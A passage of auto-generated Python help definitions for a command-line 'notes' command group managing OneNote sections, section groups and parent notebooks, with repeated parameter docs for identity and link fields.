future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from 